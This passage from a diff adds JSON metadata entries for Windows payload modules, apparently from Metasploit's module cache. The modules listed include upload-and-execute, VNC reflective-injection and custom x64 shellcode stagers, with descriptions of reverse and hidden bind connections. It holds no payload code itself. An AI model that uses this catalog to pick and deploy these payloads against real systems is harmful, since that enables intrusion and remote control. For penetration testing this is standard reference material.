false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/upexec/reverse_udp": { + "name": "Windows Upload/Execute, Reverse UDP Stager with UUID Support", + "fullname": "payload/windows/upexec/reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 ", + "sf ", + "RageLtMan " + ], + "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID 
Support", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_udp.rb", + "is_install_path": true, + "ref_name": "windows/upexec/reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_udp" + }, + "payload_windows/vncinject/bind_hidden_ipknock_tcp": { + "name": "VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/vncinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/vncinject/bind_hidden_tcp": { + "name": "VNC Server (Reflective Injection), Hidden Bind TCP Stager", + "fullname": "payload/windows/vncinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_hidden_tcp", + "check": false, + 
"post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/vncinject/bind_ipv6_tcp": { + "name": "VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/vncinject/bind_ipv6_tcp_uuid": { + "name": "VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + 
"URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/vncinject/bind_named_pipe": { + "name": "VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "UserExistsError" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a pipe connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/vncinject/bind_nonx_tcp": { + "name": "VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)", + "fullname": 
"payload/windows/vncinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "vlad902 " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/vncinject/bind_tcp": { + "name": "VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": 
false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/vncinject/bind_tcp_rc4": { + "name": "VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/vncinject/bind_tcp_uuid": { + "name": "VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/vncinject/find_tag": { + "name": "VNC Server (Reflective Injection), Find Tag Ordinal Stager", + "fullname": "payload/windows/vncinject/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "skape " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nUse an established connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/vncinject/reverse_http": { + "name": "VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel 
communication over HTTP (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_http" + }, + "payload_windows/vncinject/reverse_http_proxy_pstore": { + "name": "VNC Server (Reflective Injection), Reverse HTTP Stager Proxy", + "fullname": "payload/windows/vncinject/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_http_proxy_pstore" + }, + 
"payload_windows/vncinject/reverse_ipv6_tcp": { + "name": "VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/vncinject/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker over IPv6", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/vncinject/reverse_nonx_tcp": { + "name": "VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/vncinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "vlad902 " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": 
true, + "ref_name": "windows/vncinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/vncinject/reverse_ord_tcp": { + "name": "VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/vncinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "spoonm " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/vncinject/reverse_tcp": { + "name": "VNC Server (Reflective Injection), Reverse TCP Stager", + "fullname": "payload/windows/vncinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + 
"URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/vncinject/reverse_tcp_allports": { + "name": "VNC Server (Reflective Injection), Reverse All-Port TCP Stager", + "fullname": "payload/windows/vncinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/vncinject/reverse_tcp_dns": { + "name": "VNC Server (Reflective Injection), Reverse TCP Stager (DNS)", + 
"fullname": "payload/windows/vncinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/vncinject/reverse_tcp_rc4": { + "name": "VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_tcp_rc4", + "check": false, + 
"post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/vncinject/reverse_tcp_rc4_dns": { + "name": "VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/vncinject/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/vncinject/reverse_tcp_uuid": { + "name": "VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", 
+ "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/vncinject/reverse_winhttp": { + "name": "VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)", + "fullname": "payload/windows/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "hdm ", + "Borja Merino " + ], + "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", + "is_install_path": true, + "ref_name": "windows/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_windows/x64/custom/bind_ipv6_tcp": { + "name": "Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", + "fullname": 
"payload/windows/x64/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "sf " + ], + "description": "Custom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_windows/x64/custom/bind_ipv6_tcp_uuid": { + "name": "Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/windows/x64/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + 
"payload_windows/x64/custom/bind_named_pipe": { + "name": "Windows shellcode stage, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/windows/x64/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "UserExistsError" + ], + "description": "Custom shellcode stage.\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_windows/x64/custom/bind_tcp": { + "name": "Windows shellcode stage, Windows x64 Bind TCP Stager", + "fullname": "payload/windows/x64/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "sf " + ], + "description": "Custom shellcode stage.\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp" + 
}, + "payload_windows/x64/custom/bind_tcp_rc4": { + "name": "Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/custom/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_windows/x64/custom/bind_tcp_uuid": { + "name": "Windows shellcode stage, 